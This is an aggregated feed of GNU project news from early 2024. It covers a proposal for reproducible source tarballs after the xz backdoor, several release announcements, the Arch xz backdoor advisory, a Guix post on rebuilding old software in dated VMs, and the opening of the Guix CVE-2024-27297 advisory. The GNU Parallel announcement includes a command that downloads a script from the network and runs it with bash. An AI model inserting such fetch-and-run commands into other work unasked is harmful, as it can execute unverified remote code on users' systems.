#gnu

federatica_bot@federatica.space

Simon Josefsson: Towards reproducible minimal source code tarballs? On *-src.tar.gz

While the work to analyze the xz backdoor is in progress, several ideas have been suggested to improve the entire software supply chain ecosystem. Some of those ideas are good, some of the ideas are at best irrelevant and harmless, and some suggestions are plain bad. I’d like to attempt to formalize one idea (remains to be see in which category it belongs), which have been discussed before, but the context in which the idea can be appreciated have not been as clear as it is today.

  1. Reproducible source tarballs. The idea is that published source tarballs should be possible to reproduce independently somehow, and that this should be continuously tested and verified — preferrably as part of the upstream project continuous integration system (e.g., GitHub action or GitLab pipeline). While nominally this looks easy to achieve, there are some complex matters in this, for example: what timestamps to use for files in the tarball? I’ve brought up this aspect before.
  2. Minimal source tarballs without generated vendor files. Most GNU Autoconf/Automake-based tarballs pre-generated files which are important for bootstrapping on exotic systems that does not have the required dependencies. For the bootstrapping story to succeed, this approach is important to support. However it has become clear that this practice raise significant costs and risks. Most modern GNU/Linux distributions have all the required dependencies and actually prefers to re-build everything from source code. These pre-generated extra files introduce uncertainty to that process.

My strawman proposal to improve things is to define new tarball format *-src.tar.gz with at least the following properties:

  1. The tarball should allow users to build the project, which is the entire purpose of all this. This means that at least all source code for the project has to be included.
  2. The tarballs should be signed, for example with PGP or minisign.
  3. The tarball should be possible to reproduce bit-by-bit by a third party using upstream’s version controlled sources and a pointer to which revision was used (e.g., git tag or git commit).
  4. The tarball should not require an Internet connection to download things.
    • Corollary: every external dependency either has to be explicitly documented as such (e.g., gcc and GnuTLS), or included in the tarball.
    • Observation: This means including all *.po gettext translations which are normally downloaded when building from version controlled sources.
  5. The tarball should contain everything required to build the project from source using as much externally released versioned tooling as possible. This is the “minimal” property lacking today.
    • Corollary: This means including a vendored copy of OpenSSL or libz is not acceptable: link to them as external projects.
    • Open question: How about non-released external tooling such as gnulib or autoconf archive macros? This is a bit more delicate: most distributions either just package one current version of gnulib or autoconf archive, not previous versions. While this could change, and distributions could package the gnulib git repository (up to some current version) and the autoconf archive git repository — and packages were set up to extract the version they need (gnulib’s ./bootstrap already supports this via the –gnulib-refdir parameter), this is not normally in place.
    • Suggested Corollary: The tarball should contain content from git submodule’s such as gnulib and the necessary Autoconf archive M4 macros required by the project.
  6. Similar to how the GNU project specify the ./configure interface we need a documented interface for how to bootstrap the project. I suggest to use the already well established idiom of running ./bootstrap to set up the package to later be able to be built via ./configure. Of course, some projects are not using the autotool ./configure interface and will not follow this aspect either, but like most build systems that compete with autotools have instructions on how to build the project, they should document similar interfaces for bootstrapping the source tarball to allow building.

If tarballs that achieve the above goals were available from popular upstream projects, distributions could more easily use them instead of current tarballs that include pre-generated content. The advantage would be that the build process is not tainted by “unnecessary” files. We need to develop tools for maintainers to create these tarballs, similar to make dist that generate today’s foo-1.2.3.tar.gz files.

I think one common argument against this approach will be: Why bother with all that, and just use git-archive outputs? Or avoid the entire tarball approach and move directly towards version controlled check outs and referring to upstream releases as git URL and commit tag or id. My counter-argument is that this optimize for packagers’ benefits at the cost of upstream maintainers: most upstream maintainers do not want to store gettext *.po translations in their source code repository. A compromise between the needs of maintainers and packagers is useful, so this *-src.tar.gz tarball approach is the indirection we need to solve that.

What do you think?

#gnu #gnuorg #opensource

federatica_bot@federatica.space

parallel @ Savannah: GNU Parallel 20240322 ('Sweden') released [stable]

GNU Parallel 20240322 ('Sweden') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

GNU parallel ftw

-- hostux.social/@rmpr @_paulmairo@twitter

New in this release:

  • Bug fixes and man page updates.

GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.

About GNU Parallel

GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.

If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.

GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.

For example you can run this to convert all jpeg files into png and gif files and have a progress bar:

parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif

Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:

find . -name '*.jpg' |

parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200

You can find more about GNU Parallel at: http://www.gnu.org/s/parallel/

You can install GNU Parallel in just 10 seconds with:

$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \

fetch -o - http://pi.dk/3 ) > install.sh

$ sha1sum install.sh | grep 883c667e01eed62f975ad28b6d50e22a

12345678 883c667e 01eed62f 975ad28b 6d50e22a

$ md5sum install.sh | grep cc21b4c943fd03e93ae1ae49e28573c0

cc21b4c9 43fd03e9 3ae1ae49 e28573c0

$ sha512sum install.sh | grep ec113b49a54e705f86d51e784ebced224fdff3f52

79945d9d 250b42a4 2067bb00 99da012e c113b49a 54e705f8 6d51e784 ebced224

fdff3f52 ca588d64 e75f6033 61bd543f d631f592 2f87ceb2 ab034149 6df84a35

$ bash install.sh

Watch the intro video on http://www.youtube.com/playlist?list=PL284C9FF2488BC6D1

Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.

When using programs that use GNU Parallel to process data for publication please cite:

O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/10.5281/zenodo.1146014.

If you like GNU Parallel:

  • Give a demo at your local user group/team/colleagues
  • Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
  • Get the merchandise https://gnuparallel.threadless.com/designs/gnu-parallel
  • Request or write a review for your favourite blog or magazine
  • Request or build a package for your favourite distribution (if it is not already there)
  • Invite me for your next conference

If you use programs that use GNU Parallel for research:

  • Please cite GNU Parallel in you publications (use --citation)

If GNU Parallel saves you money:

About GNU SQL

GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.

The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.

When using GNU SQL for a publication please cite:

O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.

About GNU Niceload

GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

poke @ Savannah: poke-elf 1.0 released

I am happy to announce the first release of poke-elf, version 1.0.

The tarball poke-elf-1.0.tar.gz is now available at

https://ftp.gnu.org/gnu/poke/poke-elf-1.0.tar.gz.

poke-elf (https://jemarch.net/poke-elf) is a full-fledged GNU poke pickle for editing ELF object

files, executables, shared libraries and core dumps. It supports

many architectures and extensions.

This pickle is part of the GNU poke project.

GNU poke (https://jemarch.net/poke) is an interactive, extensible

editor for binary data. Not limited to editing basic entities such

as bits and bytes, it provides a full-fledged procedural,

interactive programming language designed to describe data

structures and to operate on them.

Please send us comments, suggestions, bug reports, patches ,

questions, complaints, bitcoins, or whatever, to poke-devel@gnu.org.

Happy ELF poking!

---

Jose E. Marchesi

Frankfurt am Main

30 March 2024

#gnu #gnuorg #opensource

federatica_bot@federatica.space

Parabola GNU/Linux-libre: [arch-announce] The xz package has been backdoored

From: "Arch Linux: Recent news updates: David Runge" arch-announce@lists.archlinux.org

TL;DR: Upgrade your systems and container images now!

As many of you may have already read 1, the upstream release tarballs for xz in version 5.6.0 and 5.6.1 contain malicious code which adds a backdoor.

This vulnerability is tracked in the Arch Linux security tracker 2.

The xz packages prior to version 5.6.1-2 (specifically 5.6.0-1 and 5.6.1-1) contain this backdoor.

We strongly advise against using affected release artifacts and instead downloading what is currently available as latest version!

Upgrading the system

It is strongly advised to do a full system upgrade right away if your system currently has xz version 5.6.0-1 or 5.6.1-1 installed:

pacman -Syu

Regarding sshd authentication bypass/code execution

From the upstream report 1:

openssh does not directly use liblzma. However debian and several other distributions patch openssh to support systemd notification, and libsystemd does depend on lzma.

Arch does not directly link openssh to liblzma, and thus this attack vector is not possible. You can confirm this by issuing the following command:

ldd "$(command -v sshd)"

However, out of an abundance of caution, we advise users to remove the malicious code from their system by upgrading either way. This is because other yet-to-be discovered methods to exploit the backdoor could exist.

URL: https://archlinux.org/news/the-xz-package-has-been-backdoored/

#gnu #gnuorg #opensource

federatica_bot@federatica.space

coreutils @ Savannah: coreutils-9.5 released [stable]

This is to announce coreutils-9.5, a stable release.

See the NEWS below for a summary of changes.

There have been 187 commits by 18 people in the 30 weeks since 9.4.

Thanks to everyone who has contributed!

The following people contributed changes to this release:

Aearil (1) Petr Malat (1)

Bruno Haible (3) Pádraig Brady (75)

Christian Göttsche (1) Samuel Tardieu (1)

Collin Funk (4) Stephane Chazelas (1)

Daan De Meyer (1) Stephen Kitt (1)

Greg Wooledge (1) Sylvestre Ledru (3)

Grisha Levit (2) Ville Skyttä (1)

Michel Lind (1) dann frazier (1)

Paul Eggert (89) lvgenggeng (1)

Pádraig [on behalf of the coreutils maintainers]

==================================================================

Here is the GNU coreutils home page:

https://gnu.org/s/coreutils/

For a summary of changes and contributors, see:

https://git.sv.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.5

or run this command from a git-cloned coreutils directory:

git shortlog v9.4..v9.5

Here are the compressed sources:

https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.gz (15MB)

https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.xz (5.8MB)

Here are the GPG detached signatures:

https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.gz.sig

https://ftp.gnu.org/gnu/coreutils/coreutils-9.5.tar.xz.sig

Use a mirror for higher download bandwidth:

https://www.gnu.org/order/ftp.html

Here are the SHA1 and SHA256 checksums:

3285114d93b39e5e4643b0846f570203a5e4c97b coreutils-9.5.tar.gz

dnrmoilQ7ELzul98Heed0ngA7o6bhkLaXe21l0oXQeU= coreutils-9.5.tar.gz

867fed7ce2ee15c5150a355a5f3a3b50578cf78d coreutils-9.5.tar.xz

zTKO3qyS9qZl3p8yPJO3Eq8YWLwuDYjz9xAEaUcKG4o= coreutils-9.5.tar.xz

Verify the base64 SHA256 checksum with cksum -a sha256 --check

from coreutils-9.2 or OpenBSD's cksum since 2007.

Use a .sig file to verify that the corresponding file (without the

.sig suffix) is intact. First, be sure to download both the .sig file

and the corresponding tarball. Then, run a command like this:

gpg --verify coreutils-9.5.tar.gz.sig

The signature should match the fingerprint of the following key:

pub rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]

Key fingerprint = 6C37 DC12 121A 5006 BC1D B804 DF6F D971 3060 37D9

uid [ultimate] Pádraig Brady P@draigBrady.com

uid [ultimate] Pádraig Brady pixelbeat@gnu.org

If that command fails because you don't have the required public key,

or that public key has expired, try the following commands to retrieve

or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key P@draigBrady.com

gpg --recv-keys DF6FD971306037D9

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU

keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg

gpg --keyring gnu-keyring.gpg --verify coreutils-9.5.tar.gz.sig

This release was bootstrapped with the following tools:

Autoconf 2.72c.32-cb6fb

Automake 1.16.5

Gnulib v0.1-7293-g259829e78b

Bison 3.8.2

NEWS

  • Noteworthy changes in release 9.5 (2024-03-28) [stable]

** Bug fixes

chmod -R now avoids a race where an attacker may replace a traversed file

with a symlink, causing chmod to operate on an unintended file.

[This bug was present in "the beginning".]

cp, mv, and install no longer issue spurious diagnostics like "failed

to preserve ownership" when copying to GNU/Linux CIFS file systems.

They do this by working around some Linux CIFS bugs.

cp --no-preserve=mode will correctly maintain set-group-ID bits

for created directories. Previously on systems that didn't support ACLs,

cp would have reset the set-group-ID bit on created directories.

[bug introduced in coreutils-8.20]

join and uniq now support multi-byte characters better.

For example, 'join -tX' now works even if X is a multi-byte character,

and both programs now treat multi-byte characters like U+3000

IDEOGRAPHIC SPACE as blanks if the current locale treats them so.

numfmt options like --suffix no longer have an arbitrary 127-byte limit.

[bug introduced with numfmt in coreutils-8.21]

mktemp with --suffix now better diagnoses templates with too few X's.

Previously it conflated the insignificant --suffix in the error.

[bug introduced in coreutils-8.1]

sort again handles thousands grouping characters in single-byte locales

where the grouping character is greater than CHAR_MAX. For e.g. signed

character platforms with a 0xA0 (aka &nbsp) grouping character.

[bug introduced in coreutils-9.1]

split --line-bytes with a mixture of very long and short lines

no longer overwrites the heap (CVE-2024-0684).

[bug introduced in coreutils-9.2]

tail no longer mishandles input from files in /proc and /sys file systems,

on systems with a page size larger than the stdio BUFSIZ.

[This bug was present in "the beginning".]

timeout avoids a narrow race condition, where it might kill arbitrary

processes after a failed process fork.

[bug introduced with timeout in coreutils-7.0]

timeout avoids a narrow race condition, where it might fail to

kill monitored processes immediately after forking them.

[bug introduced with timeout in coreutils-7.0]

wc no longer fails to count unprintable characters as parts of words.

[bug introduced in textutils-2.1]

** Changes in behavior

base32 and base64 no longer require padding when decoding.

Previously an error was given for non padded encoded data.

base32 and base64 have improved detection of corrupted encodings.

Previously encodings with non zero padding bits were accepted.

basenc --base16 -d now supports lower case hexadecimal characters.

Previously an error was given for lower case hex digits.

cp --no-clobber, and mv -n no longer exit with failure status if

existing files are encountered in the destination. Instead they revert

to the behavior from before v9.2, silently skipping existing files.

ls --dired now implies long format output without hyperlinks enabled,

and will take precedence over previously specified formats or hyperlink mode.

numfmt will accept lowercase 'k' to indicate Kilo or Kibi units on input,

and uses lowercase 'k' when outputting such units in '--to=si' mode.

pinky no longer tries to canonicalize the user's login location by default,

rather requiring the new --lookup option to enable this often slow feature.

wc no longer ignores encoding errors when counting words.

Instead, it treats them as non white space.

** New features

chgrp now accepts the --from=OWNER:GROUP option to restrict changes to files

with matching current OWNER and/or GROUP, as already supported by chown(1).

chmod adds support for -h, -H,-L,-P, and --dereference options, providing

more control over symlink handling. This supports more secure handling of

CLI arguments, and is more consistent with chown, and chmod on other systems.

cp now accepts the --keep-directory-symlink option (like tar), to preserve

and follow existing symlinks to directories in the destination.

cp and mv now accept the --update=none-fail option, which is similar

to the --no-clobber option, except that existing files are diagnosed,

and the command exits with failure status if existing files.

The -n,--no-clobber option is best avoided due to platform differences.

env now accepts the -a,--argv0 option to override the zeroth argument

of the command being executed.

mv now accepts an --exchange option, which causes the source and

destination to be exchanged. It should be combined with

--no-target-directory (-T) if the destination is a directory.

The exchange is atomic if source and destination are on a single

file system that supports atomic exchange; --exchange is not yet

supported in other situations.

od now supports printing IEEE half precision floating point with -t fH,

or brain 16 bit floating point with -t fB, where supported by the compiler.

tail now supports following multiple processes, with repeated --pid options.

** Improvements

cp,mv,install,cat,split now read and write a minimum of 256KiB at a time.

This was previously 128KiB and increasing to 256KiB was seen to increase

throughput by 10-20% when reading cached files on modern systems.

env,kill,timeout now support unnamed signals. kill(1) for example now

supports sending such signals, and env(1) will list them appropriately.

SELinux operations in file copy operations are now more efficient,

avoiding unneeded MCS/MLS label translation.

sort no longer dynamically links to libcrypto unless -R is used.

This decreases startup overhead in the typical case.

wc is now much faster in single-byte locales and somewhat faster in

multi-byte locales.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

FSF News: Alyssa Rosenzweig, who spearheaded the reverse-engineering of Apple's GPU, to keynote LibrePlanet

BOSTON, Massachusetts, USA -- March 27, 2024 -- The Free Software Foundation (FSF) today announced Alyssa Rosenzweig, who reverse-engineered Apple's current line of graphics processing units (GPU), as keynote speaker for LibrePlanet 2024. LibrePlanet 2024: Cultivating Community is the sixteenth edition of the FSF's conference on ethical technology and user freedom and will be held on May 4 and 5 at the Wentworth Institute of Technology in Boston, MA, as well as online.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Adventures on the quest for long-term reproducible deployment

image

Rebuilding software five years later, how hard can it be? It can’t be that hard, especially when you pride yourself on having a tool that can travel in time and that does a good job at ensuring reproducible builds, right?

In hindsight, we can tell you: it’s more challenging than it seems. Users attempting to travel 5 years back with guix time-machine are (or were ) unavoidably going to hit bumps on the road—a real problem because that’s one of the use cases Guix aims to support well, in particular in a reproducible research context.

In this post, we look at some of the challenges we face while traveling back, how we are overcoming them, and open issues.

The vision

First of all, one clarification: Guix aims to support time travel, but we’re talking of a time scale measured in years, not in decades. We know all too well that this is already very ambitious—it’s something that probably nobody except Nix and Guix are even trying. More importantly, software deployment at the scale of decades calls for very different, more radical techniques; it’s the work of archivists.

Concretely, Guix 1.0.0 was released in 2019 and our goal is to allow users to travel as far back as 1.0.0 and redeploy software from there, as in this example:

$ guix time-machine -q --commit=v1.0.0 -- \
     environment --ad-hoc python2 -- python
> guile: warning: failed to install locale
Python 2.7.15 (default, Jan  1 1970, 00:00:01) 
[GCC 5.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

(The command above uses guix environment, the predecessor of guix shell, which didn’t exist back then.) It’s only 5 years ago but it’s pretty much remote history on the scale of software evolution—in this case, that history comprises major changes in Guix itself and in Guile. How well does such a command work? Well, it depends.

The project has two build farms; bordeaux.guix.gnu.org has been keeping substitutes (pre-built binaries) of everything it built since roughly 2021, while ci.guix.gnu.org keeps substitutes for roughly two years, but there is currently no guarantee on the duration substitutes may be retained. Time traveling to a period where substitutes are available is fine: you end up downloading lots of binaries, but that’s OK, you rather quickly have your software environment at hand.

Bumps on the build road

Things get more complicated when targeting a period in time for which substitutes are no longer available, as was the case for v1.0.0 above. (And really, we should assume that substitutes won’t remain available forever: fellow NixOS hackers recently had to seriously consider trimming their 20-year-long history of substitutes because the costs are not sustainable.)

Apart from the long build times, the first problem that arises in the absence of substitutes is source code unavailability. I’ll spare you the details for this post—that problem alone would deserve a book. Suffice to say that we’re lucky that we started working on integrating Guix with Software Heritage years ago, and that there has been great progress over the last couple of years to get closer to full package source code archival (more precisely: 94% of the source code of packages available in Guix in January 2024 is archived, versus 72% of the packages available in May 2019).

So what happens when you run the time-machine command above? It brings you to May 2019, a time for which none of the official build farms had substitutes until a few days ago. Ideally, thanks to isolated build environments, you’d build things for hours or days, and in the end all those binaries will be here just as they were 5 years ago. In practice though, there are several problems that isolation as currently implemented does not address.

Screenshot of movie “Safety Last!” with Harold Lloyd hanging from a clock on a building’s façade.

Among those, the most frequent problem is time traps : software build processes that fail after a certain date (these are also referred to as “time bombs” but we’ve had enough of these and would rather call for a ceasefire). This plagues a handful of packages out of almost 30,000 but unfortunately we’re talking about packages deep in the dependency graph. Here are some examples:

  • OpenSSL unit tests fail after a certain date because some of the X.509 certificates they use have expired.
  • GnuTLS had similar issues; newer versions rely on datefudge to fake the date while running the tests and thus avoid that problem altogether.
  • Python 2.7, found in Guix 1.0.0, also had that problem with its TLS-related tests.
  • OpenJDK would fail to build at some point with this interesting message: Error: time is more than 10 years from present: 1388527200000 (the build system would consider that its data about currencies is likely outdated after 10 years).
  • Libgit2, a dependency of Guix, had (has?) a time-dependent tests.
  • MariaDB tests started failing in 2019.

Someone traveling to v1.0.0 will hit several of these, preventing guix time-machine from completing. A serious bummer, especially to those who’ve come to Guix from the perspective of making their research workflow reproducible.

Time traps are the main road block, but there’s more! In rare cases, there’s software influenced by kernel details not controlled by the build daemon:

In a handful of cases, but important ones, builds might fail when performed on certain CPUs. We’re aware of at least two cases:

Neither time traps nor those obscure hardware-related issues can be avoided with the isolation mechanism currently used by the build daemon. This harms time traveling when substitutes are unavailable. Giving up is not in the ethos of this project though.

Where to go from here?

There are really two open questions here:

  1. How can we tell which packages needs to be “fixed”, and how: building at a specific date, on a specific CPU?
  2. How can keep those aspects of the build environment (time, CPU variant) under control?

Let’s start with #2. Before looking for a solution, it’s worth remembering where we come from. The build daemon runs build processes with a separate root file system, under dedicated user IDs, and in separate Linux namespaces, thereby minimizing interference with the rest of the system and ensuring a well-defined build environment. This technique was implemented by Eelco Dolstra for Nix in 2007 (with namespace support added in 2012), at a time where the word container had to do with boats and before “Docker” became the name of a software tool. In short, the approach consists in controlling the build environment in every detail (it’s at odds with the strategy that consists in achieving reproducible builds in spite of high build environment variability). That these are mere processes with a bunch of bind mounts makes this approach inexpensive and appealing.

Realizing we’d also want to control the build environment’s date, we naturally turn to Linux namespaces to address that—Dolstra, Löh, and Pierron already suggested something along these lines in the conclusion of their 2010 Journal of Functional Programming paper. Turns out there is now a time namespace. Unfortunately it’s limited to CLOCK_MONOTONIC and CLOCK_BOOTTIME clocks; the manual page states:

Note that time namespaces do not virtualize the CLOCK_REALTIME clock. Virtualization of this clock was avoided for reasons of complexity and overhead within the kernel.

I hear you say: What aboutdatefudge and libfaketime? These rely on the LD_PRELOAD environment variable to trick the dynamic linker into pre-loading a library that provides symbols such as gettimeofday and clock_gettime. This is a fine approach in some cases, but it’s too fragile and too intrusive when targeting arbitrary build processes.

That leaves us with essentially one viable option: virtual machines (VMs). The full-system QEMU lets you specify the initial real-time clock of the VM with the -rtc flag, which is exactly what we need (“user-land” QEMU such as qemu-x86_64 does not support it). And of course, it lets you specify the CPU model to emulate.

News from the past

Now, the question is: where does the VM fit? The author considered writing a package transformation that would change a package such that it’s built in a well-defined VM. However, that wouldn’t really help: this option didn’t exist in past revisions, and it would lead to a different build anyway from the perspective of the daemon—a different derivation.

The best strategy appeared to be offloading: the build daemon can offload builds to different machines over SSH, we just need to let it send builds to a suitably-configured VM. To do that, we can reuse some of the machinery initially developed for childhurds that takes care of setting up offloading to the VM: creating substitute signing keys and SSH keys, exchanging secret key material between the host and the guest, and so on.

The end result is a service for Guix System users that can be configured in a few lines:

(use-modules (gnu services virtualization))

(operating-system
  ;; …
  (services (append (list (service virtual-build-machine-service-type))
                    %base-services)))

The default setting above provides a 4-core VM whose initial date is January 2020, emulating a Skylake CPU from that time—the right setup for someone willing to reproduce old binaries. You can check the configuration like this:

$ sudo herd configuration build-vm
CPU: Skylake-Client
number of CPU cores: 4
memory size: 2048 MiB
initial date: Wed Jan 01 00:00:00Z 2020

To enable offloading to that VM, one has to explicitly start it, like so:

$ sudo herd start build-vm

From there on, every native build is offloaded to the VM. The key part is that with almost no configuration, you get everything set up to build packages “in the past”. It’s a Guix System only solution; if you run Guix on another distro, you can set up a similar build VM but you’ll have to go through the cumbersome process that is all taken care of automatically here.

Of course it’s possible to choose different configuration parameters:

(service virtual-build-machine-service-type
         (virtual-build-machine
          (date (make-date 0 0 00 00 01 10 2017 0)) ;further back in time
          (cpu "Westmere")
          (cpu-count 16)
          (memory-size (* 8 1024))
          (auto-start? #t)))

With a build VM with its date set to January 2020, we have been able to rebuild Guix and its dependencies along with a bunch of packages such as emacs-minimal from v1.0.0, overcoming all the time traps and other challenges described earlier. As a side effect, substitutes are now available from ci.guix.gnu.org so you can even try this at home without having to rebuild the world:

$ guix time-machine -q --commit=v1.0.0 -- build emacs-minimal --dry-run
guile: warning: failed to install locale
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
38.5 MB would be downloaded:
   /gnu/store/53dnj0gmy5qxa4cbqpzq0fl2gcg55jpk-emacs-minimal-26.2

For the fun of it, we went as far as v0.16.0, released in December 2018:

guix time-machine -q --commit=v0.16.0 -- \
  environment --ad-hoc vim -- vim --version

This is the furthest we can go since channels and the underlying mechanisms that make time travel possible did not exist before that date.

There’s one “interesting” case we stumbled upon in that process: in OpenSSL 1.1.1g (released April 2020 and packaged in December 2020), some of the test certificates are not valid before April 2020, so the build VM needs to have its clock set to May 2020 or thereabouts. Booting the build VM with a different date can be done without reconfiguring the system:

$ sudo herd stop build-vm
$ sudo herd start build-vm -- -rtc base=2020-05-01T00:00:00

The -rtc … flags are passed straight to QEMU, which is handy when exploring workarounds…

The time-travel continuous integration jobset has been set up to check that we can, at any time, travel back to one of the past releases. This at least ensures that Guix itself and its dependencies have substitutes available at ci.guix.gnu.org.

Reproducible research workflows reproduced

Incidentally, this effort rebuilding 5-year-old packages has allowed us to fix embarrassing problems. Software that accompanies research papers that followed our reproducibility guidelines could no longer be deployed, at least not without this clock twiddling effort:

It’s good news that we can now re-deploy these 5-year-old software environments with minimum hassle; it’s bad news that holding this promise took extra effort.

The ability to reproduce the environment of software that accompanies research work should not be considered a mundanity or an exercise that’s “overkill”. The ability to rerun, inspect, and modify software are the natural extension of the scientific method. Without a companion reproducible software environment, research papers are merely the advertisement of scholarship , to paraphrase Jon Claerbout.

The future

The astute reader surely noticed that we didn’t answer question #1 above:

How can we tell which packages needs to be “fixed”, and how: building at a specific date, on a specific CPU?

It’s a fact that Guix so far lacks information about the date, kernel, or CPU model that should be used to build a given package. Derivations purposefully lack that information on the grounds that it cannot be enforced in user land and is rarely necessary—which is true, but “rarely” is not the same as “never”, as we saw. Should we create a catalog of date, CPU, and/or kernel annotations for packages found in past revisions? Should we define, for the long-term, an all-encompassing derivation format? If we did and effectively required virtual build machines, what would that mean from a bootstrapping standpoint?

Here’s another option: build packages in VMs running in the year 2100, say, and on a baseline CPU. We don’t need to require all users to set up a virtual build machine—that would be impractical. It may be enough to set up the project build farms so they build everything that way. This would allow us to catch time traps and year 2038 bugs before they bite.

Before we can do that, the virtual-build-machine service needs to be optimized. Right now, offloading to build VMs is as heavyweight as offloading to a separate physical build machine: data is transferred back and forth over SSH over TCP/IP. The first step will be to run SSH over a paravirtualized transport instead such as AF_VSOCK sockets. Another avenue would be to make /gnu/store in the guest VM an overlay over the host store so that inputs do not need to be transferred and copied.

Until then, happy software (re)deployment!

Acknowledgments

Thanks to Simon Tournier for insightful comments on a previous version of this post.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNUnet News: GNUnet 0.21.1

GNUnet 0.21.1

This is a bugfix release for gnunet 0.21.0. It primarily addresses some connectivity issues introduced with our new transport subsystem.

Links

The GPG key used to sign is: 3D11063C10F98D14BD24D1470B0998EF86F59B6A

Note that due to mirror synchronization, not all links may be functional early after the release. For direct access try https://ftp.gnu.org/gnu/gnunet/

#gnu #gnuorg #opensource

federatica_bot@federatica.space

a2ps @ Savannah: a2ps 4.15.6 released [stable]

I am delighted to announce version 4.15.6 of GNU a2ps, the Anything to

PostScript converter.

This release fixes a couple of bugs, in particular with printing (the -P

flag). See below for details.

Here are the compressed sources and a GPG detached signature:

https://ftpmirror.gnu.org/a2ps/a2ps-4.15.6.tar.gz

https://ftpmirror.gnu.org/a2ps/a2ps-4.15.6.tar.gz.sig

Use a mirror for higher download bandwidth:

https://www.gnu.org/order/ftp.html

Here are the SHA1 and SHA256 checksums:

e20e8009d8812c8d960884b79aab95f235c725c0 a2ps-4.15.6.tar.gz

h/+dgByxGWkYHVuM+LZeZeWyS7DHahuCXoCY8pBvvfQ a2ps-4.15.6.tar.gz

The SHA256 checksum is base64 encoded, instead of the

hexadecimal encoding that most checksum tools default to.

Use a .sig file to verify that the corresponding file (without the

.sig suffix) is intact. First, be sure to download both the .sig file

and the corresponding tarball. Then, run a command like this:

gpg --verify a2ps-4.15.6.tar.gz.sig

The signature should match the fingerprint of the following key:

pub rsa2048 2013-12-11 [SC]

2409 3F01 6FFE 8602 EF44 9BB8 4C8E F3DA 3FD3 7230

uid Reuben Thomas rrt@sc3d.org

uid keybase.io/rrt rrt@keybase.io

If that command fails because you don't have the required public key,

or that public key has expired, try the following commands to retrieve

or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key rrt@sc3d.org

gpg --recv-keys 4C8EF3DA3FD37230

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=a2ps&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU

keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg

gpg --keyring gnu-keyring.gpg --verify a2ps-4.15.6.tar.gz.sig

This release was bootstrapped with the following tools:

Autoconf 2.71

Automake 1.16.5

Gnulib v0.1-7186-g5aa8eafc0e

NEWS

  • Noteworthy changes in release 4.15.6 (2024-03-13) [stable]
  • Bug fixes:
    - Fix a2ps-lpr-wrapper to work with no arguments, as a2ps requires.
    - Minor fixes & improvements to sheets.map for image types and PDF.
  • Build system:
    - Minor fixes and improvements.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)

A security issue has been identified in guix-daemon which allows for fixed-output derivations, such as source code tarballs or Git checkouts, to be corrupted by an unprivileged user. This could also lead to local privilege escalation. This was originally reported to Nix but also affects Guix as we share some underlying code from an older version of Nix for the guix-daemon. Readers only interested in making sure their Guix is up to date and no longer affected by this vulnerability can skip down to the "Upgrading" section.

Vulnerability

The basic idea of the attack is to pass file descriptors through Unix sockets to allow another process to modify the derivation contents. This was first reported to Nix by jade and puckipedia with further details and a proof of concept here. Note that the proof of concept is written for Nix and has been adapted for GNU Guix below. This security advisory is registered as CVE-2024-27297 (details are also available at Nix's GitHub security advisory) and rated "moderate" in severity.

A fixed-output derivation is one where the output hash is known in advance. For instance, to produce a source tarball. The GNU Guix build sandbox purposefully excludes network access (for security and to ensure we can control and reproduce the build environment), but a fixed-output derivation does have network access, for instance to download that source tarball. However, as stated, the hash of output must be known in advance, again for security (we know if the file contents would change) and reproducibility (should always have the same output). The guix-daemon handles the build process and writing the output to the store, as a privileged process.

